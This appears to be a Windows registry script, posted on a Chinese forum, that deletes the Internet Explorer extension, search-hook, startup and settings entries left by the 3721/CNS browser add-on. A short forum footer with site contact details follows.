[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{
00000000-0000-0001-0001-596BAEDD1289 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{
0F7DE07D-BD74-4991-9D5F-ECBB8391875D }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{
5D73EE86-05F1-49ed-B850-E423120EC338 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{
ECF2E268-F28C-48d2-9AB7-8F69C11CCB71 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{
FD00D911-7529-4084-9946-A29F1BDF4FE5 }]

[-HKEY_CURRENT_USER\Software\3721]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Search\OCustomizeSearch]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Search\OSearchAssistant]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Search\CustomizeSearch]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Search\SearchAssistant]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{ D157330A-9EF3-49F8-9A67-4141AC41ADD4 }]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CnsMin]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\EK_Entry]
[-HKEY_USERS\S-1-5-21-789336058-764733703-1343024091-1003\Software\Microsoft\Internet Explorer\Main\CNSAutoUpdate]
[-HKEY_USERS\S-1-5-21-789336058-764733703-1343024091-1003\Software\Microsoft\Internet Explorer\Main\CNSEnable]
[-HKEY_USERS\S-1-5-21-789336058-764733703-1343024091-1003\Software\Microsoft\Internet Explorer\Main\CNSHint]
[-HKEY_USERS\S-1-5-21-789336058-764733703-1343024091-1003\Software\Microsoft\Internet Explorer\Main\CNSList]
[-HKEY_USERS\S-1-5-21-789336058-764733703-1343024091-1003\Software\Microsoft\Internet Explorer\Main\CNSMenu]
[-HKEY_USERS\S-1-5-21-789336058-764733703-1343024091-1003\Software\Microsoft\Internet Explorer\Main\CNSReset]




如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部